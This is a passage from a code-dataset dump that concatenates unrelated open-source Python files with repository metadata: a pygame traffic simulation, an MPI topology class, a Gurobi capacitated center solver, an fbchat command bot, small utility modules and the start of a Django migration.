        elif (daytime >= 1260):
            sleeptime = 4
        Vehicle(lane_number, vehicleTypes[vehicle_type], direction_number, directionNumbers[direction_number])
        time.sleep(sleeptime)
        daytime += sleeptime
def turnp(probability):
    """Bernoulli trial: return True with the given probability."""
    return random.uniform(0, 1) <= probability
class Main:
    """Render/driver loop of the simulation.

    NOTE(review): this "class" is really a script — everything in the body
    executes once at class-definition time, and the trailing `while True`
    render loop never returns, so the `Main()` call after the class body is
    never actually reached.
    """
    thread1 = threading.Thread(name="initialization",target=initialize, args=())  # initialization
    thread1.daemon = True
    thread1.start()

    # Colours
    black = (0, 0, 0)
    white = (255, 255, 255)

    # Screensize
    screenWidth = 1400
    screenHeight = 800
    screenSize = (screenWidth, screenHeight)

    # Setting background image i.e. image of intersection
    background = pygame.image.load('images/intersection.png')

    screen = pygame.display.set_mode(screenSize)
    pygame.display.set_caption("SIMULATION")

    # Loading signal images and font
    redSignal = pygame.image.load('images/signals/red.png')
    yellowSignal = pygame.image.load('images/signals/yellow.png')
    greenSignal = pygame.image.load('images/signals/green.png')
    font = pygame.font.Font(None, 30)

    thread2 = threading.Thread(name="generateVehicles",target=generateVehicles, args=())  # Generating vehicles
    thread2.daemon = True
    thread2.start()

    while True:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                sys.exit()

        screen.blit(background,(0,0))  # display background in simulation
        for i in range(0,noOfSignals):  # display signal and set timer according to current status: green, yello, or red
            if(i==currentGreen):
                if(currentYellow==1):
                    signals[i].signalText = signals[i].yellow
                    screen.blit(yellowSignal, signalCoods[i])
                else:
                    signals[i].signalText = signals[i].green
                    screen.blit(greenSignal, signalCoods[i])
            else:
                # red timer is only shown in its final 10 seconds
                if(signals[i].red<=10):
                    signals[i].signalText = signals[i].red
                else:
                    signals[i].signalText = "---"
                screen.blit(redSignal, signalCoods[i])
        signalTexts = ["","","",""]

        # display signal timer
        for i in range(0,noOfSignals):
            signalTexts[i] = font.render(str(signals[i].signalText), True, white, black)
            screen.blit(signalTexts[i],signalTimerCoods[i])

        # display the vehicles
        for vehicle in simulation:
            screen.blit(vehicle.image, [vehicle.x, vehicle.y])
            vehicle.move()
        pygame.display.update()
Main() | 41.407767 | 220 | 0.590074 | 1,522 | 12,795 | 4.931012 | 0.167543 | 0.023984 | 0.025583 | 0.027981 | 0.300333 | 0.243038 | 0.223584 | 0.192538 | 0.167089 | 0.132445 | 0 | 0.046994 | 0.279875 | 12,795 | 309 | 221 | 41.407767 | 0.767528 | 0.138335 | 0 | 0.195122 | 0 | 0 | 0.031136 | 0.008558 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036585 | false | 0 | 0.020325 | 0 | 0.130081 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5bc9bb9de777c853bd717ee97128cd3e2825f2c | 6,327 | py | Python | pylbm/mpi_topology.py | Mopolino8/pylbm | b457ccdf1e7a1009807bd1136a276886f81a9e7d | [
"BSD-3-Clause"
] | 106 | 2016-09-13T07:19:17.000Z | 2022-03-19T13:41:55.000Z | pylbm/mpi_topology.py | Mopolino8/pylbm | b457ccdf1e7a1009807bd1136a276886f81a9e7d | [
"BSD-3-Clause"
] | 53 | 2017-09-18T04:51:19.000Z | 2022-01-19T21:36:23.000Z | pylbm/mpi_topology.py | gouarin/pylbm | fd4419933e05b85be364232fddedfcb4f7275e1f | [
"BSD-3-Clause"
] | 33 | 2016-06-17T13:21:17.000Z | 2021-11-11T16:57:46.000Z | # Authors:
# Loic Gouarin <loic.gouarin@polytechnique.edu>
# Benjamin Graille <benjamin.graille@math.u-psud.fr>
#
# License: BSD 3 clause
"""
Module which implements a Cartesian MPI topology
"""
import numpy as np
import mpi4py.MPI as mpi
from .options import options
class MpiTopology:
    """
    Interface construction using a MPI topology.

    Parameters
    ----------
    dim : int
        number of spatial dimensions (1, 2, or 3)
    comm : comm
        the default MPI communicator
    period : list
        boolean list that specifies if a direction is periodic or not.
        Its size is dim.

    Attributes
    ----------
    dim : int
        number of spatial dimensions (1, 2, or 3)
    comm : comm
        the original communicator passed in
    cartcomm : comm
        the Cartesian communicator built from `comm` and `split`
    split : ndarray
        number of processes in each direction
    npx, npy, npz : int
        requested process counts per direction from the command line
        options (all 1 by default, in which case MPI computes the split)

    Methods
    -------
    set_options :
        defines command line options.
    get_coords :
        return the coords of the process in the MPI topology.
    get_region_indices :
        return the region indices owned by each sub domain.
    get_region :
        return the region indices owned by this sub domain.
    """

    def __init__(self, dim, period, comm=mpi.COMM_WORLD):
        self.dim = dim
        self.set_options()
        self.comm = comm
        # if npx, npy and npz are all set to the default value (1)
        # then Compute_dims performs the splitting of the domain
        if self.npx == self.npy == self.npz == 1:
            size = comm.Get_size()
            split = mpi.Compute_dims(size, self.dim)
        else:
            split = (self.npx, self.npy, self.npz)

        self.split = np.asarray(split[:self.dim])
        self.cartcomm = comm.Create_cart(self.split, period)

    def get_region_indices_(self, n, axis=0):
        """
        1D region indices owned by each sub domain.

        Parameters
        ----------
        n : int
            number of total discrete points for a given axis
        axis : int
            axis used in the MPI topology

        Returns
        -------
        list
            list of regions owned by each processes for a given axis
        """
        region_indices = [0]
        nproc = self.cartcomm.Get_topo()[0][axis]
        for i in range(nproc):
            # n//nproc points each, with the remainder (n % nproc) spread
            # one extra point over the first processes
            region_indices.append(region_indices[-1] + n//nproc + ((n % nproc) > i))
        return region_indices

    def get_region_indices(self, nx, ny=None, nz=None):
        """
        Region indices owned by each sub domain.

        Parameters
        ----------
        nx : int
            number of total discrete points in x direction
        ny : int
            number of total discrete points in y direction
            default is None
        nz : int
            number of total discrete points in z direction
            default is None

        Returns
        -------
        list
            list of regions owned by each processes
        """
        region_indices = [self.get_region_indices_(nx, 0)]
        if ny is not None:
            region_indices.append(self.get_region_indices_(ny, 1))
        if nz is not None:
            region_indices.append(self.get_region_indices_(nz, 2))
        return region_indices

    def get_coords(self):
        """
        return the coords of the process in the MPI topology
        as a numpy array.
        """
        rank = self.cartcomm.Get_rank()
        return np.asarray(self.cartcomm.Get_coords(rank))

    def get_region(self, nx, ny=None, nz=None):
        """
        Region indices owned by the sub domain.

        Parameters
        ----------
        nx : int
            number of total discrete points in x direction
        ny : int
            number of total discrete points in y direction
            default is None
        nz : int
            number of total discrete points in z direction
            default is None

        Returns
        -------
        list
            region owned by the process
        """
        region_indices = self.get_region_indices(nx, ny, nz)
        coords = self.get_coords()
        region = []
        for i in range(coords.size):
            # [start, end) slice of this process along axis i
            region.append([region_indices[i][coords[i]],
                           region_indices[i][coords[i] + 1]
                           ])
        return region

    def set_options(self):
        """
        defines command line options.
        """
        self.npx = int(options().npx)
        self.npy = int(options().npy)
        self.npz = int(options().npz)
def get_directions(dim):
    """
    Return an array with all the directions around.

    Parameters
    ----------
    dim : int
        number of spatial dimensions (1, 2, or 3)

    Returns
    -------
    ndarray
        all the possible directions with a stencil of 1

    Examples
    --------
    >>> get_directions(1)
    array([[-1],
           [ 0],
           [ 1]])
    """
    base = np.array([-1, 0, 1])
    if dim == 1:
        return base[:, np.newaxis]
    # Cartesian product of {-1, 0, 1} over `dim` axes; with indexing='ij'
    # the first column varies slowest, matching the original ordering.
    grids = np.meshgrid(*([base] * dim), indexing='ij')
    return np.stack([g.ravel() for g in grids], axis=-1).astype(np.int32)
| 26.472803 | 89 | 0.5633 | 793 | 6,327 | 4.417402 | 0.211854 | 0.074222 | 0.031402 | 0.031973 | 0.475592 | 0.439052 | 0.39509 | 0.343134 | 0.329717 | 0.2495 | 0 | 0.018792 | 0.335546 | 6,327 | 238 | 90 | 26.584034 | 0.814462 | 0.460408 | 0 | 0.066667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.116667 | false | 0 | 0.05 | 0 | 0.266667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5bd1c8d864738a7eee90d8736eddcad096e5f3d | 10,060 | py | Python | exact.py | jesgadiaz/ckc | 717e7289fff530ea5be4d6db94dc2936e355ed8c | [
"Apache-2.0"
] | 1 | 2020-02-20T10:01:03.000Z | 2020-02-20T10:01:03.000Z | exact.py | jesgadiaz/ckc | 717e7289fff530ea5be4d6db94dc2936e355ed8c | [
"Apache-2.0"
] | null | null | null | exact.py | jesgadiaz/ckc | 717e7289fff530ea5be4d6db94dc2936e355ed8c | [
"Apache-2.0"
] | 1 | 2019-12-05T05:30:50.000Z | 2019-12-05T05:30:50.000Z | from gurobipy import *
import math
import numpy as np
import heapq
def heap_sort(items):
    """Sort *items* in place (ascending) and return the same list.

    Replaces the previous heapify/heappop round-trip with list.sort():
    same contract (in-place ascending sort, returns the input list) but
    simpler and faster (Timsort, implemented in C).
    """
    items.sort()
    return items
def createGraph(input_file, instance_format):
    """Populate the global distance structures from an instance file.

    Parameters
    ----------
    input_file : str
        'orlib': one "<u> <v> <weight>" edge per line (1-based vertices);
        'tsplib': one "<id> <x> <y>" coordinate line per vertex.
    instance_format : str
        'orlib' or 'tsplib'

    Side effects (globals): sets `matrix` (n x n distances — all-pairs
    shortest paths for orlib, Euclidean for tsplib), `m`, and
    `ordered_sizes` (sorted upper-triangle distances).  `n` must already
    be set by the caller.
    """
    global n, m, k, matrix, ordered_sizes
    if instance_format == 'orlib':
        # n x n matrix initialised to +inf (no edge known yet).
        matrix = [[float("inf")] * n for _ in range(n)]
        m = sum(1 for line in open(input_file))
        with open(input_file, "r") as f:
            for _ in range(m):
                fields = f.readline().split()
                # FIX: the original tested `string is not "EOF"` — an identity
                # comparison of a list against a string literal, which is
                # always True.  Skip blank lines and an explicit EOF marker.
                if not fields or fields[0] == "EOF":
                    continue
                v1 = int(fields[0]) - 1
                v2 = int(fields[1]) - 1
                weight = int(fields[2])
                matrix[v1][v2] = weight
                matrix[v2][v1] = weight
        for i in range(n):
            matrix[i][i] = 0
        # All-pairs shortest paths (Floyd–Warshall with pivot i outermost);
        # relies on the matrix being symmetric.
        for i in range(n):
            for j in range(n):
                for l in range(n):
                    if matrix[i][j] == float("inf") or matrix[i][l] == float("inf"):
                        cost = float("inf")
                    else:
                        cost = matrix[i][j] + matrix[i][l]
                    if cost < matrix[j][l]:
                        matrix[j][l] = cost
        ordered_sizes = heap_sort([matrix[i][j]
                                   for i in range(n) for j in range(i, n)])
    elif instance_format == 'tsplib':
        m = n
        positions = []
        with open(input_file, "r") as f:
            for _ in range(m):
                fields = f.readline().split()
                positions.append([int(fields[0]) - 1,
                                  float(fields[1]),
                                  float(fields[2])])
        # Dense Euclidean distance matrix from the 2-D coordinates.
        matrix = [[0.0] * n for _ in range(n)]
        for i in range(n):
            for j in range(n):
                dx = positions[i][1] - positions[j][1]
                dy = positions[i][2] - positions[j][2]
                dist_temp = math.sqrt(dx * dx + dy * dy)
                matrix[i][j] = dist_temp
                matrix[j][i] = dist_temp
        for i in range(n):
            matrix[i][i] = 0
        ordered_sizes = heap_sort([matrix[i][j]
                                   for i in range(n) for j in range(i, n)])
def run(r):
    """Solve the capacitated dominating set MIP for coverage radius *r*.

    Builds a 0/1 "pruned" adjacency matrix (pairs at distance <= r), then
    asks Gurobi for a minimum set of centers `y` such that every vertex is
    covered, every non-center is assigned (via `x`) to exactly one adjacent
    center, and each center serves at most L vertices.  Results are printed
    as JSON-ish text; `num_centers` and `runtime` are published via globals.

    NOTE(review): the global `m` (line/edge count set by createGraph) is
    clobbered here with the Gurobi Model object.
    """
    global total_runtime, k, runtime, num_centers, m, cap, input_file
    # 0/1 adjacency under radius r: prunedMatrix[i][j] == 1 iff d(i, j) <= r.
    prunedMatrix = []
    for i in range(0,n):
        list = []
        for j in range(0,n):
            list.append(float(0))
        prunedMatrix.append(list)
    for i in range(0,n):
        for j in range(0,n):
            if matrix[i][j] <= r:
                prunedMatrix[i][j] = 1
    try:
        global m, num_centers, runtime, cap
        m = Model("mip1")
        # Require a provably optimal solution (no MIP gap).
        m.setParam("MIPGap", 0.0);
        # y[i] == 1 iff vertex i is chosen as a center.
        y = []
        for i in range(n):
            y.append(0)
        for i in range(n):
            y[i] = m.addVar(vtype=GRB.BINARY, name="y%s" % str(i+1))
        # Objective: minimize the number of centers.
        m.setObjective(sum(y), GRB.MINIMIZE)
        # Coverage: every vertex must have at least one center within r.
        temp_list = np.array(prunedMatrix).T.tolist()
        for i in range(n):
            m.addConstr(sum(np.multiply(temp_list[i], y).tolist()) >= 1)
        # x[i][j] == 1 iff vertex i is assigned to center j.
        x = []
        for i in range(n):
            temp = []
            for j in range(n):
                temp.append(0)
            x.append(temp)
        for i in range(n):
            for j in range(n):
                x[i][j] = m.addVar(vtype=GRB.BINARY, name="x%s%s" % (str(i+1), str(j+1)))
        # Capacity: a center may serve at most L vertices.
        temp_list_2 = np.array(x).T.tolist()
        for i in range(n):
            m.addConstr(sum(temp_list_2[i]) * y[i] <= L)
        # Assignment only to an adjacent, chosen center; centers themselves
        # are not assigned (the (1 - y[i]) factor).
        for i in range(n):
            for j in range(n):
                #m.addConstr(x[i][j] <= y[j] * prunedMatrix[i][j])
                m.addConstr(x[i][j] <= y[j] * prunedMatrix[i][j] * (1-y[i]))
        # Every non-center is assigned to exactly one center.
        for i in range(n):
            #m.addConstr(sum(x[i]) == 1)
            m.addConstr(sum(x[i]) == 1 * (1-y[i]))
        m.optimize()
        runtime = m.Runtime
        print("The run time is %f" % runtime)
        print("Obj:", m.objVal)
        # Recover the solution from the variable values.  Variables come back
        # in creation order: all y's first, then x's row by row.
        dom_set_size = 0
        solution = []
        assignment = []
        center = 0
        vertex_j = 1
        vertex_i = 1
        for v in m.getVars():
            varName = v.varName
            if varName[0] == 'y':
                if v.x == 1.0:
                    dom_set_size = dom_set_size + 1
                    solution.append(varName[1:])
            else:
                if vertex_j <= n:
                    if v.x == 1.0:
                        assignment.append([vertex_i, vertex_j])
                else:
                    vertex_i = vertex_i + 1
                    vertex_j = 1
                vertex_j = vertex_j + 1
        print("Cap. dom. set cardinality: " + str(dom_set_size))
        solution = [int(i) for i in solution]
        # Emit the solution as a JSON-like report: one entry per center with
        # the vertices assigned to it.
        print('{"instance": "%s",' % input_file)
        print('"centers": [')
        counter = 0
        for center in solution:
            counter = counter + 1
            nodes = []
            for node in assignment:
                if node[1] == center:
                    nodes.append(node[0])
            if counter == len(solution):
                print('{ "center": ' + str(center) + ', "nodes": ' + str(nodes) + '}')
            else:
                print('{ "center": ' + str(center) + ', "nodes": ' + str(nodes) + '},')
        print(']}')
        # Published for binarySearch() to decide the next radius.
        num_centers = dom_set_size
        # num_centers = m.objVal
    except GurobiError:
        print("Error reported")
def binarySearch():
    """Binary-search the sorted pairwise distances for the smallest radius
    whose capacitated dominating set uses at most k centers.

    Relies on globals set by createGraph() (ordered_sizes) and run()
    (num_centers, runtime); prints the best radius and total solve time.
    """
    global total_runtime, k, runtime, num_centers, input_file
    total_runtime = 0
    lower, upper = 0, len(ordered_sizes) - 1
    best_solution_size = float("inf")
    while True:
        mid = math.ceil((upper + lower) / 2)
        mid_value = ordered_sizes[int(mid)]
        run(mid_value)
        total_runtime = total_runtime + runtime
        if mid == upper:
            # Interval collapsed: last candidate evaluated, stop.
            break
        if num_centers <= k:
            # Feasible with <= k centers: shrink from above.
            upper = mid
            print("UPPER = MID")
            if mid_value <= best_solution_size:
                best_solution_size = mid_value
        else:
            # Infeasible: grow from below.
            lower = mid
            print("LOWER = MID")
    print("best solution size: " + str(best_solution_size))
    print("total runtime: " + str(total_runtime))
if __name__ == "__main__":
    # FIX: `sys` was never imported explicitly and only worked through
    # gurobipy's wildcard import; also dropped the module-level `global`
    # statement, which is a no-op at module scope.
    import sys

    if len(sys.argv) != 6:
        print ("Wrong number of arguments")
        print ("exact input_file_path n k L instance_format")
        sys.exit()
    input_file = sys.argv[1]
    n = int(sys.argv[2])
    k = int(sys.argv[3])
    L = int(sys.argv[4])
    instance_format = sys.argv[5]
    createGraph(input_file, instance_format)
    binarySearch()
| 37.677903 | 193 | 0.41004 | 1,152 | 10,060 | 3.488715 | 0.235243 | 0.057477 | 0.032844 | 0.057477 | 0.36427 | 0.329933 | 0.276437 | 0.233143 | 0.185369 | 0.185369 | 0 | 0.061296 | 0.375646 | 10,060 | 266 | 194 | 37.819549 | 0.57857 | 0.199006 | 0 | 0.348259 | 0 | 0 | 0.042515 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.019901 | false | 0 | 0.019901 | 0 | 0.044776 | 0.074627 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5bd703be1b27cb762cec30b232a4d069f3d4c16 | 204 | py | Python | PySrc/4day/Mod00.py | Timmy-Oh/Adorable-Lab | c21454d011e6888fd28c41d1624721ea1826be40 | [
"Apache-2.0"
] | null | null | null | PySrc/4day/Mod00.py | Timmy-Oh/Adorable-Lab | c21454d011e6888fd28c41d1624721ea1826be40 | [
"Apache-2.0"
] | null | null | null | PySrc/4day/Mod00.py | Timmy-Oh/Adorable-Lab | c21454d011e6888fd28c41d1624721ea1826be40 | [
"Apache-2.0"
] | null | null | null | # Mod00.py
# Demo of the three import styles for the Calc00 module.
print('name: {}'.format(__name__))

import Calc00
import Calc00 as c
from Calc00 import *

x, y = 20, 10
Calc00.Sum(x, y)  # fully qualified call
c.Sub(x, y)       # via module alias
Mul(x, y)         # via star import

import sys
for path in sys.path:
    print(path)
| 12 | 34 | 0.661765 | 39 | 204 | 3.358974 | 0.538462 | 0.045802 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083832 | 0.181373 | 204 | 16 | 35 | 12.75 | 0.700599 | 0.039216 | 0 | 0 | 0 | 0 | 0.041237 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.363636 | 0 | 0.363636 | 0.181818 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
e5bd9846792ca0380e9358b95728eb11553310f8 | 1,887 | py | Python | bot.py | liamkirsh/FBChatBot | 59eafee2c78f2d6a93c38a74fecf1a4d311a00e9 | [
"MIT"
] | 3 | 2017-07-23T20:10:19.000Z | 2020-09-23T21:21:47.000Z | bot.py | liamkirsh/FBChatBot | 59eafee2c78f2d6a93c38a74fecf1a4d311a00e9 | [
"MIT"
] | 1 | 2018-03-06T05:34:07.000Z | 2018-03-07T19:51:18.000Z | bot.py | liamkirsh/FBChatBot | 59eafee2c78f2d6a93c38a74fecf1a4d311a00e9 | [
"MIT"
] | null | null | null | from collections import namedtuple
from fbchat import Client
from fbchat.models import ThreadType
class Bot(Client):
    """fbchat client that dispatches chat messages to registered commands.

    Commands are registered with add_message_handler() and may be restricted
    to admins and/or to messages addressed to the bot ("@<name> ..." or DM).
    """

    Command = namedtuple('Command', ['func', 'admin', 'directed'])

    def __init__(self, email, password, name, admins=None, protected=None, *args, **kwargs):
        """Log in and register the built-in "help" command.

        FIX: the original used mutable default arguments (admins=[],
        protected=[]), which are shared across instances; None sentinels
        preserve the old call signature.
        """
        admins = [] if admins is None else list(admins)
        protected = [] if protected is None else list(protected)
        super(Bot, self).__init__(email=email, password=password,
                                  *args, **kwargs)
        self.name = name
        self.protected = protected + admins
        self.admins = admins
        self.commands = {}
        self.add_message_handler("help", self.commands_cmd)

    def commands_cmd(self, msg):
        """Print this message."""
        # FIX: dict.iteritems() does not exist on Python 3; use items().
        # Sorted so that admin-only commands are listed last.
        commands_msg = "You can say:\n"
        for kword, cmd in sorted(self.commands.items(), key=lambda x: x[1].admin):
            admin_msg = " (admin only)" if cmd.admin else ""
            commands_msg += "{}:{} {}\n".format(kword, admin_msg, cmd.func.__doc__)
        self.sendMessage(commands_msg, msg['thread_id'], msg['thread_type'])

    def add_message_handler(self, kword, func, admin=False, directed=True):
        """Register *func* to run when a message starts with *kword*."""
        self.commands[kword] = Bot.Command(func, admin, directed)

    def onMessage(self, **kwargs):
        """Dispatch an incoming message to the matching command, if any."""
        super(Bot, self).onMessage(**kwargs)
        if kwargs['author_id'] == self.uid:
            return  # ignore our own messages
        is_admin = kwargs['author_id'] in self.admins
        is_directed = kwargs['message'].startswith("@" + self.name)
        is_dm = kwargs['thread_type'] == ThreadType.USER
        if is_directed:
            # Strip the "@<name>" prefix before extracting the keyword.
            kwargs['message'] = kwargs['message'].split("@" + self.name)[1].strip()
        kword = kwargs['message'].split(' ', 1)[0].lower()
        cmd = self.commands.get(kword)
        if (cmd and (not cmd.admin or is_admin)
                and (not cmd.directed or is_directed or is_dm)):
            cmd.func(kwargs)
| 38.510204 | 88 | 0.598304 | 227 | 1,887 | 4.810573 | 0.325991 | 0.054945 | 0.029304 | 0.043956 | 0.049451 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002861 | 0.259141 | 1,887 | 48 | 89 | 39.3125 | 0.778255 | 0.010069 | 0 | 0 | 0 | 0 | 0.077873 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.135135 | false | 0.054054 | 0.081081 | 0.027027 | 0.324324 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
e5bdc2fd22c992b2cd181d55011e5aa6b716ab9f | 80 | py | Python | devices/windows_wsl.py | premandfriends/boardfarm-1 | 3c952c94507fff25ba9955cad993610ea4a95e2e | [
"BSD-3-Clause-Clear"
] | null | null | null | devices/windows_wsl.py | premandfriends/boardfarm-1 | 3c952c94507fff25ba9955cad993610ea4a95e2e | [
"BSD-3-Clause-Clear"
] | 1 | 2019-02-03T17:06:21.000Z | 2019-02-03T17:06:21.000Z | devices/windows_wsl.py | mgualco-contractor/boardfarm | 6a033e5dc84c7368fdd8ec2738b08b35ca7b07e7 | [
"BSD-3-Clause-Clear"
] | 1 | 2020-03-05T01:58:34.000Z | 2020-03-05T01:58:34.000Z | import debian
class WindowsWSL(debian.DebianBox):
    """Debian device flavor running under Windows Subsystem for Linux."""

    # Identifier string used for device selection (the original's
    # parentheses were redundant — ('windows_wsl') is just a str).
    model = 'windows_wsl'
| 13.333333 | 35 | 0.725 | 9 | 80 | 6.333333 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.1625 | 80 | 5 | 36 | 16 | 0.850746 | 0 | 0 | 0 | 0 | 0 | 0.1375 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 4 |
e5bfc9b67168b7368cc1fe061546a71eda82eb03 | 242 | py | Python | zeroshot_topics/utils.py | charyeezy/zeroshot_topics | c77b12fcd82b87703eb6e92d6eac6d741c4de59f | [
"Apache-2.0",
"MIT"
] | 49 | 2021-11-21T08:33:05.000Z | 2022-03-11T22:47:00.000Z | zeroshot_topics/utils.py | charyeezy/zeroshot_topics | c77b12fcd82b87703eb6e92d6eac6d741c4de59f | [
"Apache-2.0",
"MIT"
] | 4 | 2021-11-22T13:54:44.000Z | 2022-01-07T19:43:08.000Z | zeroshot_topics/utils.py | charyeezy/zeroshot_topics | c77b12fcd82b87703eb6e92d6eac6d741c4de59f | [
"Apache-2.0",
"MIT"
] | 4 | 2021-11-22T18:39:45.000Z | 2022-02-24T05:11:56.000Z | from functools import lru_cache
from transformers import pipeline
@lru_cache
def load_zeroshot_model(model_name="valhalla/distilbart-mnli-12-6"):
    """Build a HuggingFace zero-shot classification pipeline.

    Memoized with lru_cache so the model is only loaded once per
    *model_name* within a process.
    """
    return pipeline("zero-shot-classification", model=model_name)
| 26.888889 | 71 | 0.805785 | 32 | 242 | 5.90625 | 0.6875 | 0.084656 | 0.148148 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013953 | 0.11157 | 242 | 8 | 72 | 30.25 | 0.865116 | 0 | 0 | 0 | 0 | 0 | 0.219008 | 0.219008 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.333333 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
e5c0e09f7a45cb2ecf9eba32890f4af165a441f0 | 273 | py | Python | Draft/Decode a cipher.py | mwk0408/codewars_solutions | 9b4f502b5f159e68024d494e19a96a226acad5e5 | [
"MIT"
] | 6 | 2020-09-03T09:32:25.000Z | 2020-12-07T04:10:01.000Z | Draft/Decode a cipher.py | mwk0408/codewars_solutions | 9b4f502b5f159e68024d494e19a96a226acad5e5 | [
"MIT"
] | 1 | 2021-12-13T15:30:21.000Z | 2021-12-13T15:30:21.000Z | Draft/Decode a cipher.py | mwk0408/codewars_solutions | 9b4f502b5f159e68024d494e19a96a226acad5e5 | [
"MIT"
] | null | null | null | table={i:j for i,j in enumerate("abcdefghijklmnopqrstuvwxyz"+"abcdefghijklmnopqrstuvwxyz".upper())}
def decode(cipher, b, c):
    """Decode a list of cipher values into letters.

    Each output letter is table[value - previous_value - b - c], with the
    previous value starting at 0.

    FIX: the original mutated the caller's list via cipher.insert(0, 0);
    this version tracks the previous element locally instead.
    """
    prev = 0
    letters = []
    for value in cipher:
        letters.append(table[value - prev - b - c])
        prev = value
    return "".join(letters)
e5c1039cda0312feb3e593ae896f87fa3acd4dcc | 53 | py | Python | src/HABApp/rule/scheduler/__init__.py | DerOetzi/HABApp | a123fbfa9928ebb3cda9a84f6984dcba593c8236 | [
"Apache-2.0"
] | 44 | 2018-12-13T08:46:44.000Z | 2022-03-07T03:23:21.000Z | src/HABApp/rule/scheduler/__init__.py | DerOetzi/HABApp | a123fbfa9928ebb3cda9a84f6984dcba593c8236 | [
"Apache-2.0"
] | 156 | 2019-03-02T20:53:31.000Z | 2022-03-23T13:13:58.000Z | src/HABApp/rule/scheduler/__init__.py | DerOetzi/HABApp | a123fbfa9928ebb3cda9a84f6984dcba593c8236 | [
"Apache-2.0"
] | 18 | 2019-03-08T07:13:21.000Z | 2022-03-22T19:52:31.000Z | from .habappschedulerview import HABAppSchedulerView
| 26.5 | 52 | 0.90566 | 4 | 53 | 12 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.075472 | 53 | 1 | 53 | 53 | 0.979592 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e5c143fee608434a37b93838fcca4dd45eb0545b | 627 | py | Python | cases/migrations/0002_auto_20200506_2202.py | testyourcodenow/core | 05865b02ff7e60ffd3b30652161b3523046b9696 | [
"MIT"
] | 1 | 2020-05-10T06:40:58.000Z | 2020-05-10T06:40:58.000Z | cases/migrations/0002_auto_20200506_2202.py | testyourcodenow/core | 05865b02ff7e60ffd3b30652161b3523046b9696 | [
"MIT"
] | 25 | 2020-05-03T08:10:38.000Z | 2021-09-22T18:59:29.000Z | cases/migrations/0002_auto_20200506_2202.py | testyourcodenow/core | 05865b02ff7e60ffd3b30652161b3523046b9696 | [
"MIT"
] | 10 | 2020-05-03T08:25:56.000Z | 2020-06-03T06:49:34.000Z | # Generated by Django 3.0.3 on 2020-05-06 22:02
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated schema migration for the `cases` app.

    Adds an explicit auto-increment primary key to `Visual` and redefines
    `country` as a 255-char CharField.  Kept byte-identical on purpose:
    hand-editing generated migrations causes drift from `makemigrations`.
    """

    dependencies = [
        ('cases', '0001_initial'),
    ]

    operations = [
        migrations.AddField(
            model_name='visual',
            name='id',
            # default=4 backfills existing rows during the migration;
            # preserve_default=False drops that default from the model after.
            field=models.AutoField(auto_created=True, default=4, primary_key=True, serialize=False, verbose_name='ID'),
            preserve_default=False,
        ),
        migrations.AlterField(
            model_name='visual',
